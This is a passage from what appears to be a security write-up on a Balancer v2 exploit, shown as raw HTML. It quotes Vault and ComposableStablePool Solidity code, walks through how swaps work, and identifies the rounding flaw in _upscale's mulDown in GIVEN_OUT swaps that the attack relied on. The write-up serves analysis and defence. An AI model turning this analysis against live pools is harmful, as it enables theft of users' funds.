class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span 
class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/pool-utils/contracts/BasePool.sol</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@notice</span> Vault hook for adding liquidity to a pool (including the first time, &quot;initializing&quot; the pool).</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> This function can only be called from the Vault, from `joinPool`.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">onJoinPool</span>(<span class="params"></span></span><br><span class="line"><span class="params">    bytes32 poolId,</span></span><br><span class="line"><span class="params">    address sender,</span></span><br><span class="line"><span class="params">    address 
recipient,</span></span><br><span class="line"><span class="params">    uint256[] memory balances,</span></span><br><span class="line"><span class="params">    uint256 lastChangeBlock,</span></span><br><span class="line"><span class="params">    uint256 protocolSwapFeePercentage,</span></span><br><span class="line"><span class="params">    bytes memory userData</span></span><br><span class="line"><span class="params"></span>) external override <span class="title function_">onlyVault</span>(poolId) <span class="title function_">returns</span> (uint256[] memory, uint256[] memory) &#123;</span><br><span class="line">    <span class="title function_">_beforeSwapJoinExit</span>();</span><br><span class="line"></span><br><span class="line">    uint256[] memory scalingFactors = <span class="title function_">_scalingFactors</span>();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="title function_">totalSupply</span>() == <span class="number">0</span>) &#123;</span><br><span class="line">        (uint256 bptAmountOut, uint256[] memory amountsIn) = <span class="title function_">_onInitializePool</span>(</span><br><span class="line">            poolId,</span><br><span class="line">            sender,</span><br><span class="line">            recipient,</span><br><span class="line">            scalingFactors,</span><br><span class="line">            userData</span><br><span class="line">        );</span><br><span class="line"></span><br><span class="line">        <span class="comment">// On initialization, we lock _getMinimumBpt() by minting it for the zero address. 
This BPT acts as a</span></span><br><span class="line">        <span class="comment">// minimum as it will never be burned, which reduces potential issues with rounding, and also prevents the</span></span><br><span class="line">        <span class="comment">// Pool from ever being fully drained.</span></span><br><span class="line">        <span class="title function_">_require</span>(bptAmountOut &gt;= <span class="title function_">_getMinimumBpt</span>(), <span class="title class_">Errors</span>.<span class="property">MINIMUM_BPT</span>);</span><br><span class="line">        <span class="title function_">_mintPoolTokens</span>(<span class="title function_">address</span>(<span class="number">0</span>), <span class="title function_">_getMinimumBpt</span>());</span><br><span class="line">        <span class="title function_">_mintPoolTokens</span>(recipient, bptAmountOut - <span class="title function_">_getMinimumBpt</span>());</span><br><span class="line"></span><br><span class="line">        <span class="comment">// amountsIn are amounts entering the Pool, so we round up.</span></span><br><span class="line">        <span class="title function_">_downscaleUpArray</span>(amountsIn, scalingFactors);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> (amountsIn, <span class="keyword">new</span> uint256[](balances.<span class="property">length</span>));</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="title function_">_upscaleArray</span>(balances, scalingFactors);</span><br><span class="line">        (uint256 bptAmountOut, uint256[] memory amountsIn) = <span class="title function_">_onJoinPool</span>(</span><br><span class="line">            poolId,</span><br><span class="line">            sender,</span><br><span class="line">            recipient,</span><br><span class="line">            balances,</span><br><span class="line">          
  lastChangeBlock,</span><br><span class="line">            <span class="title function_">inRecoveryMode</span>() ? <span class="number">0</span> : protocolSwapFeePercentage, <span class="comment">// Protocol fees are disabled while in recovery mode</span></span><br><span class="line">            scalingFactors,</span><br><span class="line">            userData</span><br><span class="line">        );</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Note we no longer use `balances` after calling `_onJoinPool`, which may mutate it.</span></span><br><span class="line"></span><br><span class="line">        <span class="title function_">_mintPoolTokens</span>(recipient, bptAmountOut);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// amountsIn are amounts entering the Pool, so we round up.</span></span><br><span class="line">        <span class="title function_">_downscaleUpArray</span>(amountsIn, scalingFactors);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// This Pool ignores the `dueProtocolFees` return value, so we simply return a zeroed-out array.</span></span><br><span class="line">        <span class="keyword">return</span> (amountsIn, <span class="keyword">new</span> uint256[](balances.<span class="property">length</span>));</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@notice</span> Vault hook for removing liquidity from a pool.</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> This function can only be called from the Vault, from `exitPool`.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title 
function_">onExitPool</span>(<span class="params"></span></span><br><span class="line"><span class="params">    bytes32 poolId,</span></span><br><span class="line"><span class="params">    address sender,</span></span><br><span class="line"><span class="params">    address recipient,</span></span><br><span class="line"><span class="params">    uint256[] memory balances,</span></span><br><span class="line"><span class="params">    uint256 lastChangeBlock,</span></span><br><span class="line"><span class="params">    uint256 protocolSwapFeePercentage,</span></span><br><span class="line"><span class="params">    bytes memory userData</span></span><br><span class="line"><span class="params"></span>) external override <span class="title function_">onlyVault</span>(poolId) <span class="title function_">returns</span> (uint256[] memory, uint256[] memory) &#123;</span><br><span class="line">    uint256[] memory amountsOut;</span><br><span class="line">    uint256 bptAmountIn;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// When a user calls `exitPool`, this is the first point of entry from the Vault.</span></span><br><span class="line">    <span class="comment">// We first check whether this is a Recovery Mode exit - if so, we proceed using this special lightweight exit</span></span><br><span class="line">    <span class="comment">// mechanism which avoids computing any complex values, interacting with external contracts, etc., and generally</span></span><br><span class="line">    <span class="comment">// should always work, even if the Pool&#x27;s mathematics or a dependency break down.</span></span><br><span class="line">    <span class="keyword">if</span> (userData.<span class="title function_">isRecoveryModeExitKind</span>()) &#123;</span><br><span class="line">        <span class="comment">// This exit kind is only available in Recovery Mode.</span></span><br><span class="line">        <span class="title 
function_">_ensureInRecoveryMode</span>();</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Note that we don&#x27;t upscale balances nor downscale amountsOut - we don&#x27;t care about scaling factors during</span></span><br><span class="line">        <span class="comment">// a recovery mode exit.</span></span><br><span class="line">        (bptAmountIn, amountsOut) = <span class="title function_">_doRecoveryModeExit</span>(balances, <span class="title function_">totalSupply</span>(), userData);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="comment">// Note that we only call this if we&#x27;re not in a recovery mode exit.</span></span><br><span class="line">        <span class="title function_">_beforeSwapJoinExit</span>();</span><br><span class="line"></span><br><span class="line">        uint256[] memory scalingFactors = <span class="title function_">_scalingFactors</span>();</span><br><span class="line">        <span class="title function_">_upscaleArray</span>(balances, scalingFactors);</span><br><span class="line"></span><br><span class="line">        (bptAmountIn, amountsOut) = <span class="title function_">_onExitPool</span>(</span><br><span class="line">            poolId,</span><br><span class="line">            sender,</span><br><span class="line">            recipient,</span><br><span class="line">            balances,</span><br><span class="line">            lastChangeBlock,</span><br><span class="line">            <span class="title function_">inRecoveryMode</span>() ? 
<span class="number">0</span> : protocolSwapFeePercentage, <span class="comment">// Protocol fees are disabled while in recovery mode</span></span><br><span class="line">            scalingFactors,</span><br><span class="line">            userData</span><br><span class="line">        );</span><br><span class="line"></span><br><span class="line">        <span class="comment">// amountsOut are amounts exiting the Pool, so we round down.</span></span><br><span class="line">        <span class="title function_">_downscaleDownArray</span>(amountsOut, scalingFactors);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Note we no longer use `balances` after calling `_onExitPool`, which may mutate it.</span></span><br><span class="line"></span><br><span class="line">    <span class="title function_">_burnPoolTokens</span>(sender, bptAmountIn);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// This Pool ignores the `dueProtocolFees` return value, so we simply return a zeroed-out array.</span></span><br><span class="line">    <span class="keyword">return</span> (amountsOut, <span class="keyword">new</span> uint256[](balances.<span class="property">length</span>));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><strong>Swap Operations</strong></p><p>In Balancer, users can exchange tokens with the Vault through <code>swap</code> and <code>batchSwap</code> without directly trusting the Pool contract itself, as all security checks are performed by the Vault. <code>swap</code> is used to execute a single token exchange, while <code>batchSwap</code> can execute multiple exchanges sequentially in the same transaction and supports multihop chain exchanges.</p><p>Each swap contains a tokenIn and a tokenOut: the former is sent by the user to the Pool, and the latter is sent by the Pool to the recipient. 
Depending on the user’s intent, swaps are divided into two types:</p><ul><li><strong>GIVEN_IN</strong>: the input amount is fixed, and the Pool calculates the output amount through the <code>onSwap</code> hook</li><li><strong>GIVEN_OUT</strong>: the output amount is fixed, and the Pool calculates the required input amount through the same <code>onSwap</code> hook</li></ul><blockquote><p>Note: although a batchSwap involves multiple swap operations, they all share one kind: either every swap is GIVEN_IN or every swap is GIVEN_OUT. The user specifies this SwapKind as a parameter when calling batchSwap, so a single batchSwap never mixes kinds.</p></blockquote><p>Regardless of how many swaps are performed, the Vault first completes all intermediate calculations and then settles the net token changes in one step at the end, which saves significant gas, especially for multihop or cross-pool swaps.</p><blockquote><p>When chaining swaps in a multihop (for example, a TokenA/TokenB swap followed by a TokenB/TokenC swap), you can set the amount of each subsequent swap to 0. The Vault then uses the amount calculated by the previous swap, so users don’t need to work out the amount for each step themselves.</p></blockquote><p><strong>Note: users are responsible for ordering the swaps correctly for the chosen SwapKind</strong>. For example, suppose there are two swap pairs: TokenA/TokenB and TokenB/TokenC. If the user wants:</p><ol><li>To swap 100 TokenA for TokenC, they need to set:<ul><li>SwapKind to <strong>GIVEN_IN</strong></li><li>SwapSteps to <code>100 TokenA/TokenB -&gt; 0 TokenB/TokenC</code>. 
This means swapping 100 TokenA for TokenB, then swapping <strong>all</strong> of the TokenB received for TokenC (the amount of the second step, TokenB/TokenC, is set to 0 to indicate that it uses the result of the previous step).</li></ul></li><li>To swap TokenA for 100 TokenC, they need to set:<ul><li>SwapKind to <strong>GIVEN_OUT</strong></li><li>SwapSteps to <code>100 TokenB/TokenC -&gt; 0 TokenA/TokenB</code>. This means working backwards: first calculate how much TokenB must be provided to receive 100 TokenC, then calculate how much TokenA must be provided to obtain that amount of TokenB.</li></ul></li></ol><p>Since batchSwap needs to support both kinds of swaps, <strong>pools need to implement amount calculations that favor the protocol for both swap directions</strong>. The function call path is: <code>batchSwap → _swapWithPools → _swapWithPool → _processGeneralPoolSwapRequest → BaseGeneralPool.onSwap → BaseGeneralPool._swapGivenIn/_swapGivenOut → the _swapGivenIn/_swapGivenOut hook functions implemented by specific pools</code>. Of these, the <code>BaseGeneralPool._swapGivenIn/_swapGivenOut</code> functions can be overridden. ComposableStablePool overrides both <code>_swapGivenIn/_swapGivenOut</code> functions to handle BPT swaps specially.</p><p>For ComposableStablePool, which is a General Pool, the pool balances that the vault operates on when processing swaps live in the _generalPoolsBalances state variable introduced earlier. 
The following code shows how the vault does this bookkeeping:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 
pkg/vault/contracts/Swaps.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_processGeneralPoolSwapRequest</span>(<span class="params">IPoolSwapStructs.SwapRequest memory request, IGeneralPool pool</span>)</span><br><span class="line">    private</span><br><span class="line">    <span class="title function_">returns</span> (uint256 amountCalculated)</span><br><span class="line">&#123;</span><br><span class="line">    bytes32 tokenInBalance;</span><br><span class="line">    bytes32 tokenOutBalance;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// We access both token indexes without checking existence, because we will do it manually immediately after.</span></span><br><span class="line">    <span class="title class_">EnumerableMap</span>.<span class="property">IERC20ToBytes32Map</span> storage poolBalances = _generalPoolsBalances[request.<span class="property">poolId</span>];</span><br><span class="line">    uint256 indexIn = poolBalances.<span class="title function_">unchecked_indexOf</span>(request.<span class="property">tokenIn</span>);</span><br><span class="line">    uint256 indexOut = poolBalances.<span class="title function_">unchecked_indexOf</span>(request.<span class="property">tokenOut</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (indexIn == <span class="number">0</span> || indexOut == <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="comment">// The tokens might not be registered because the Pool itself is not registered. 
We check this to provide a</span></span><br><span class="line">        <span class="comment">// more accurate revert reason.</span></span><br><span class="line">        <span class="title function_">_ensureRegisteredPool</span>(request.<span class="property">poolId</span>);</span><br><span class="line">        <span class="title function_">_revert</span>(<span class="title class_">Errors</span>.<span class="property">TOKEN_NOT_REGISTERED</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// EnumerableMap stores indices *plus one* to use the zero index as a sentinel value - because these are valid,</span></span><br><span class="line">    <span class="comment">// we can undo this.</span></span><br><span class="line">    indexIn -= <span class="number">1</span>;</span><br><span class="line">    indexOut -= <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">    uint256 tokenAmount = poolBalances.<span class="title function_">length</span>();</span><br><span class="line">    uint256[] memory currentBalances = <span class="keyword">new</span> uint256[](tokenAmount);</span><br><span class="line"></span><br><span class="line">    request.<span class="property">lastChangeBlock</span> = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">for</span> (uint256 i = <span class="number">0</span>; i &lt; tokenAmount; i++) &#123;</span><br><span class="line">        <span class="comment">// Because the iteration is bounded by `tokenAmount`, and no tokens are registered or deregistered here, we</span></span><br><span class="line">        <span class="comment">// know `i` is a valid token index and can use `unchecked_valueAt` to save storage reads.</span></span><br><span class="line">        bytes32 balance = poolBalances.<span class="title function_">unchecked_valueAt</span>(i);</span><br><span class="line"></span><br><span 
class="line">        currentBalances[i] = balance.<span class="title function_">total</span>();</span><br><span class="line">        request.<span class="property">lastChangeBlock</span> = <span class="title class_">Math</span>.<span class="title function_">max</span>(request.<span class="property">lastChangeBlock</span>, balance.<span class="title function_">lastChangeBlock</span>());</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (i == indexIn) &#123;</span><br><span class="line">            tokenInBalance = balance;</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (i == indexOut) &#123;</span><br><span class="line">            tokenOutBalance = balance;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Perform the swap request callback and compute the new balances for &#x27;token in&#x27; and &#x27;token out&#x27; after the swap</span></span><br><span class="line">    amountCalculated = pool.<span class="title function_">onSwap</span>(request, currentBalances, indexIn, indexOut);</span><br><span class="line">    (uint256 amountIn, uint256 amountOut) = <span class="title function_">_getAmounts</span>(request.<span class="property">kind</span>, request.<span class="property">amount</span>, amountCalculated);</span><br><span class="line">    tokenInBalance = tokenInBalance.<span class="title function_">increaseCash</span>(amountIn);</span><br><span class="line">    tokenOutBalance = tokenOutBalance.<span class="title function_">decreaseCash</span>(amountOut);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Because no tokens were registered or deregistered between now or when we retrieved the indexes for</span></span><br><span class="line">    <span class="comment">// &#x27;token in&#x27; and 
&#x27;token out&#x27;, we can use `unchecked_setAt` to save storage reads.</span></span><br><span class="line">    poolBalances.<span class="title function_">unchecked_setAt</span>(indexIn, tokenInBalance);</span><br><span class="line">    poolBalances.<span class="title function_">unchecked_setAt</span>(indexOut, tokenOutBalance);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h2 id="III-Vulnerability-Analysis">III. Vulnerability Analysis</h2><p>Let’s see how this vulnerability is triggered. First, we need to clone the <a href="https://github.com/balancer/balancer-v2-monorepo">balancer/balancer-v2-monorepo</a> repository and check out commit <code>88842344fb5f44d8ed6f8f944acd3be80627df87</code>.</p><blockquote><p>Note: The latest version of Balancer is v3, so there is also a v3 repository on GitHub, but the vulnerability exists in <strong>v2</strong>, so don’t confuse the two. Also, this commit is the latest one as of 2025/11/20; two weeks after the attack, the vulnerability patch still has not been pushed to the repository.</p></blockquote><h3 id="1-Vulnerable-Code">1. Vulnerable Code</h3><p>The previous section described Balancer’s interaction flow in detail, so we now have a reasonably clear picture of the relevant operations and variables, and understanding this vulnerability is no longer difficult. The vulnerability itself is actually quite simple. 
When a user calls vault.batchSwap with SwapKind.GIVEN_OUT, if the swap involves ComposableStablePool and tokenIn/tokenOut is not BPT, it will actually call the base class <code>BaseGeneralPool._swapGivenOut</code> to calculate the required tokenIn amount:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span 
class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/pool-stable/contracts/ComposableStablePool.sol</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> Override this hook called by the base class `onSwap`, to check whether we are doing a regular swap,</span></span><br><span class="line"><span class="comment"> * or a swap involving BPT, which is equivalent to a single token join or exit. Since one of the Pool&#x27;s</span></span><br><span class="line"><span class="comment"> * tokens is the preminted BPT, we need to handle swaps where BPT is involved separately.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * At this point, the balances are unscaled. The indices and balances are coming from the Vault, so they</span></span><br><span class="line"><span class="comment"> * refer to the full set of registered tokens (including BPT).</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * If this is a swap involving BPT, call `_swapWithBpt`, which computes the amountOut using the swapFeePercentage</span></span><br><span class="line"><span class="comment"> * and charges protocol fees, in the same manner as single token join/exits. 
Otherwise, perform the default</span></span><br><span class="line"><span class="comment"> * processing for a regular swap.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_swapGivenOut</span>(<span class="params"></span></span><br><span class="line"><span class="params">    SwapRequest memory swapRequest,</span></span><br><span class="line"><span class="params">    uint256[] memory registeredBalances,</span></span><br><span class="line"><span class="params">    uint256 registeredIndexIn,</span></span><br><span class="line"><span class="params">    uint256 registeredIndexOut,</span></span><br><span class="line"><span class="params">    uint256[] memory scalingFactors</span></span><br><span class="line"><span class="params"></span>) internal virtual override <span class="title function_">returns</span> (uint256) &#123;</span><br><span class="line">    <span class="keyword">return</span></span><br><span class="line">        (swapRequest.<span class="property">tokenIn</span> == <span class="title class_">IERC20</span>(<span class="variable language_">this</span>) || swapRequest.<span class="property">tokenOut</span> == <span class="title class_">IERC20</span>(<span class="variable language_">this</span>))</span><br><span class="line">            ? 
<span class="title function_">_swapWithBpt</span>(swapRequest, registeredBalances, registeredIndexIn, registeredIndexOut, scalingFactors)</span><br><span class="line">            : <span class="variable language_">super</span>.<span class="title function_">_swapGivenOut</span>( <span class="comment">// &lt;------ [1]</span></span><br><span class="line">                swapRequest,</span><br><span class="line">                registeredBalances,</span><br><span class="line">                registeredIndexIn,</span><br><span class="line">                registeredIndexOut,</span><br><span class="line">                scalingFactors</span><br><span class="line">            );</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// pkg/pool-utils/contracts/BaseGeneralPool.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_swapGivenOut</span>(<span class="params"></span></span><br><span class="line"><span class="params">    SwapRequest memory swapRequest,</span></span><br><span class="line"><span class="params">    uint256[] memory balances,</span></span><br><span class="line"><span class="params">    uint256 indexIn,</span></span><br><span class="line"><span class="params">    uint256 indexOut,</span></span><br><span class="line"><span class="params">    uint256[] memory scalingFactors</span></span><br><span class="line"><span class="params"></span>) internal virtual <span class="title function_">returns</span> (uint256) &#123;</span><br><span class="line">    <span class="title function_">_upscaleArray</span>(balances, scalingFactors);</span><br><span class="line">    swapRequest.<span class="property">amount</span> = <span class="title function_">_upscale</span>(swapRequest.<span class="property">amount</span>, scalingFactors[indexOut]); <span class="comment">// &lt;---- [2]</span></span><br><span class="line"></span><br><span class="line">    
uint256 amountIn = <span class="title function_">_onSwapGivenOut</span>(swapRequest, balances, indexIn, indexOut);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// amountIn tokens are entering the Pool, so we round up.</span></span><br><span class="line">    amountIn = <span class="title function_">_downscaleUp</span>(amountIn, scalingFactors[indexIn]);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Fees are added after scaling happens, to reduce the complexity of the rounding direction analysis.</span></span><br><span class="line">    <span class="keyword">return</span> <span class="title function_">_addSwapFeeAmount</span>(amountIn);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// pkg/solidity-utils/contracts/helpers/ScalingHelpers.sol</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> Applies `scalingFactor` to `amount`, resulting in a larger or equal value depending on whether it needed</span></span><br><span class="line"><span class="comment"> * scaling or not.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_upscale</span>(<span class="params">uint256 amount, uint256 scalingFactor</span>) pure <span class="title function_">returns</span> (uint256) &#123;</span><br><span class="line">    <span class="comment">// Upscale rounding wouldn&#x27;t necessarily always go in the same direction: in a swap for example the balance of</span></span><br><span class="line">    <span class="comment">// token in should be rounded up, and that of token out rounded down. 
This is the only place where we round in</span></span><br><span class="line">    <span class="comment">// the same direction for all amounts, as the impact of this rounding is expected to be minimal.</span></span><br><span class="line">    <span class="keyword">return</span> <span class="title class_">FixedPoint</span>.<span class="title function_">mulDown</span>(amount, scalingFactor); <span class="comment">// &lt;----- [3]</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>From the code, we can see that even when calculating the required tokenIn amount for GivenOut, BaseGeneralPool._swapGivenOut still uses mulDown for upscaling. <strong>However, in the GivenOut context, mulDown favors users rather than the protocol</strong>, because swapRequest.amount at this point represents how many tokenOut the user needs. If the <strong>token value</strong> calculated by _upscale comes out too low, the pool can no longer guarantee that the user pays in enough value.</p><blockquote><p>For example, in a TokenB/TokenC swap, amount = 100 means the user needs 100 TokenC, and this amount is used to calculate how many TokenB the pool needs from the user. If the amount is rounded down, then naturally the calculated amount of TokenB that must be transferred from the user to the vault also decreases.</p></blockquote><p><strong>This is the actual key code of the vulnerability.</strong> However, the comments show that the developers believed the impact here would be minimal (<em>the impact of this rounding is expected to be minimal</em>). So how did this supposedly minimal impact lead to such a massive theft of tokens? Answering that requires careful analysis of several key points. 
First, let’s go through the scalingFactor calculation process.</p><p>In ComposableStablePool, the calculated scalingFactor equals the token’s decimal scaling factor <strong>multiplied by the token rate</strong>. The result is a value with 1e18 precision, and that 1e18 precision is removed in the final step of FixedPoint.mulDown in _upscale.</p><blockquote><p>For example, if _scalingFactor0 is 1e18 and tokenRate0 is 1.1e18, then the _scalingFactors function will calculate a result of 1.1e18.<br>Next, call the _upscale function with a very small amount, for example _upscale(<strong>9</strong>, 1.1e18). The exact result would be <code>9.9e18 / 1e18 = 9.9</code>, but integer division truncates it to <code>9</code>. This calculation loses 0.9, which is a precision loss of roughly 10%.</p></blockquote><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/pool-stable/contracts/ComposableStablePoolRates.sol</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> Overrides scaling factor getter to compute the tokens&#x27; rates.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_scalingFactors</span>(<span class="params"></span>) internal view virtual override 
<span class="title function_">returns</span> (uint256[] memory) &#123;</span><br><span class="line">    <span class="comment">// There is no need to check the arrays length since both are based on `_getTotalTokens`</span></span><br><span class="line">    uint256 totalTokens = <span class="title function_">_getTotalTokens</span>();</span><br><span class="line">    uint256[] memory scalingFactors = <span class="keyword">new</span> uint256[](totalTokens);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (uint256 i = <span class="number">0</span>; i &lt; totalTokens; ++i) &#123;</span><br><span class="line">        scalingFactors[i] = <span class="title function_">_getScalingFactor</span>(i).<span class="title function_">mulDown</span>(<span class="title function_">_getTokenRate</span>(i)); <span class="comment">// &lt;---</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> scalingFactors;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>However, analyzing only up to this point is not enough. The core issue of the attack incident is not here. First, <strong>although when the _upscale amount parameter is a very small value like 9, we can indeed see obvious precision loss, the logical meaning of this small value 9 is just 9 wei</strong>. If an attacker only steals 1 wei per swap, that money wouldn’t even be enough to pay for the gas fee of a single swap. This is probably why the _upscale developers believed the impact would be minimal. 
